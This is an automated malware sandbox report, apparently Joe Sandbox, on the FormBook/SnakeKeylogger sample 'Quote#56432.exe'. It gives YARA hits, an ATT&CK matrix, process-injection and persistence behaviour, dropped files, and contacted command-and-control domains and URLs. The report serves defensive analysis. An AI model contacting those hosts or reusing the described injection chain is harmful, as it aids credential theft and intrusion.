          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection812Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information11Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 483794 Sample: Quote#56432.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for dropped file 2->46 48 11 other signatures 2->48 9 Quote#56432.exe 7 2->9         started        process3 file4 30 C:\Users\user\AppData\Roaming\ySWmXEgh.exe, PE32 9->30 dropped 32 C:\Users\...\ySWmXEgh.exe:Zone.Identifier, ASCII 9->32 dropped 34 C:\Users\user\AppData\Local\...\tmp994F.tmp, XML 9->34 dropped 36 C:\Users\user\AppData\...\Quote#56432.exe.log, ASCII 9->36 dropped 58 Uses schtasks.exe or at.exe to add and modify task schedules 9->58 60 Writes to foreign memory regions 9->60 62 Allocates memory in foreign processes 9->62 64 Injects a PE file into a foreign processes 9->64 13 RegSvcs.exe 9->13         started        16 schtasks.exe 1 9->16         started        signatures5 process6 signatures7 66 Modifies the context of a thread in another process (thread injection) 13->66 68 Maps a DLL or memory area into another process 13->68 70 Sample uses process hollowing technique 13->70 72 2 other signatures 13->72 18 systray.exe 13->18         started        21 explorer.exe 13->21 injected 24 conhost.exe 16->24         started        process8 dnsIp9 50 Modifies the context of a thread in another process (thread injection) 18->50 52 Maps a DLL or memory area into another process 18->52 54 Tries to detect virtualization through RDTSC time measurements 18->54 26 cmd.exe 1 18->26         started        38 www.lovecord.date 44.227.76.166, 49841, 80 AMAZON-02US United States 21->38 40 www.neuralviolin.com 21->40 56 System process connects to network (likely due to code injection or exploit) 21->56 signatures10 process11 process12 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Quote#56432.exe30%VirustotalBrowse
          Quote#56432.exe29%MetadefenderBrowse
          Quote#56432.exe79%ReversingLabsWin32.Trojan.SnakeKeylogger
          Quote#56432.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\ySWmXEgh.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\ySWmXEgh.exe29%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\ySWmXEgh.exe79%ReversingLabsWin32.Trojan.SnakeKeylogger

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.neuralviolin.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.carterandcone.comn-u0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cnk0%URL Reputationsafe
          http://www.carterandcone.comC0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/40%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/n-us0%Avira URL Cloudsafe
          http://www.urwpp.de%Y0%Avira URL Cloudsafe
          http://www.urwpp.deoc0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.urwpp.deFT0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Norm0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.constructioncleanup.pro/vd9n/0%Avira URL Cloudsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/-t40%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.carterandcone.com.1230%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://lovecord.date0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//z0%Avira URL Cloudsafe
          http://www.monotype.0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0-d0%Avira URL Cloudsafe
          http://www.fontbureau.comiono0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/adnl0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/j0%URL Reputationsafe
          http://www.lovecord.date/vd9n/?NfB=6+C1z2NTXQU5TtDgYCNVveFhDHAhXY7UdOammGZxKywecd1Rk4eK0uo6Q7X2XlF/f8Go&o87p=d640H6WhXv90%Avira URL Cloudsafe
          http://www.tiro.comic0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.lovecord.date
          44.227.76.166
          truetrue
            unknown
            www.neuralviolin.com
            unknown
            unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            www.constructioncleanup.pro/vd9n/true
            • Avira URL Cloud: safe
            low
            http://www.lovecord.date/vd9n/?NfB=6+C1z2NTXQU5TtDgYCNVveFhDHAhXY7UdOammGZxKywecd1Rk4eK0uo6Q7X2XlF/f8Go&o87p=d640H6WhXv9true
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.fontbureau.com/designers/cz;aQuote#56432.exe, 00000000.00000003.666549661.00000000058CE000.00000004.00000001.sdmpfalse
              high
              http://www.fontbureau.com/designersGQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                high
                http://www.carterandcone.comn-uQuote#56432.exe, 00000000.00000003.664613718.00000000058D0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designers/?Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                  high
                  http://www.founder.com.cn/cn/bTheQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designers/frere-user.html3Quote#56432.exe, 00000000.00000003.667061903.00000000058CF000.00000004.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designers/3Quote#56432.exe, 00000000.00000003.666494619.00000000058CE000.00000004.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designers?Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                        high
                        http://www.tiro.comQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designersQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                          high
                          http://www.goodfont.co.krQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.carterandcone.comQuote#56432.exe, 00000000.00000003.664495208.00000000058CF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersRQuote#56432.exe, 00000000.00000003.666850356.00000000058CF000.00000004.00000001.sdmpfalse
                            high
                            http://www.sajatypeworks.comQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersiQuote#56432.exe, 00000000.00000003.666754869.00000000058CF000.00000004.00000001.sdmpfalse
                              high
                              http://www.typography.netDQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/cTheQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersgQuote#56432.exe, 00000000.00000003.666549661.00000000058CE000.00000004.00000001.sdmpfalse
                                high
                                http://www.galapagosdesign.com/staff/dennis.htmQuote#56432.exe, 00000000.00000003.669659423.00000000058D0000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cnkQuote#56432.exe, 00000000.00000003.663958515.00000000058CE000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comCQuote#56432.exe, 00000000.00000003.664495208.00000000058CF000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/4Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/n-usQuote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.urwpp.de%YQuote#56432.exe, 00000000.00000003.667982119.00000000058D0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.urwpp.deocQuote#56432.exe, 00000000.00000003.666447003.00000000058CE000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.galapagosdesign.com/DPleaseQuote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designersxQuote#56432.exe, 00000000.00000003.673228256.00000000058D0000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.ascendercorp.com/typedesigners.htmlQuote#56432.exe, 00000000.00000003.665504791.00000000058CE000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.665428445.00000000058CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.deFTQuote#56432.exe, 00000000.00000003.668046451.00000000058D0000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
